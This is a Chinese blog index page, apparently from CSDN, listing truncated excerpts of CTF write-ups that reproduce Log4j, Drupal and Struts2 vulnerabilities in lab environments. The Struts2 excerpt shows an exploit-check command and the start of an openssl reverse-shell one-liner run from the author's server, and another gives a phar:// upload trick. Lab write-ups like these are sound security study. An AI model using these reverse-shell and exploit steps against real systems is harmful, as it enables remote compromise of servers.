- 博客(5)
- 收藏
- 关注
RSS订阅原创 [Log4j]CVE-2021-44228 CTFshow
Log4j复现 CTFshow复现参考文档1复现参考文档2环境http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/2.0 <= Apache log4j2 <= 2.14.1简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
2022-03-31 17:50:19
3691
原创 [Drupal]CVE-2019-6339 BUUCTF
[Drupal]CVE-2019-6339参考文档前期准备还是和之前一样,语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步利用找到管理员资料头像上传处Drupal 的图片默认存储位置为 /sites/default/files/pictures//,默认存储名称为其原来的名称/admin/config/media/file-system处设置临时目录phar://./sites/default/files/pictures/202
2022-03-29 18:41:11
348
1
原创 [Drupal]CVE-2018-7600 BUUCTF
[Drupal]CVE-2018-7600 BUUCTF前期准备进入之后环境安装语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步利用直接使用网上公开的exp https://github.com/a2u/CVE-2018-7600将exp里的命令换成env即可反弹会话可参考我上一篇文章,ssl反弹shell...
2022-03-29 17:30:53
4644
原创 [struts2]s2-052 BUUCTF
[struts2]s2-052 BUUCTF参考文档本地检测python struts-pwn.py --url "http://node4.buuoj.cn:29619/orders/3/edit"vps使用openssl生成生成证书的公私钥对openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes在自己的vps上创建一个openssl反弹会话的脚本mkfifo /tmp/s; /b
2022-03-29 13:42:52
3771
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人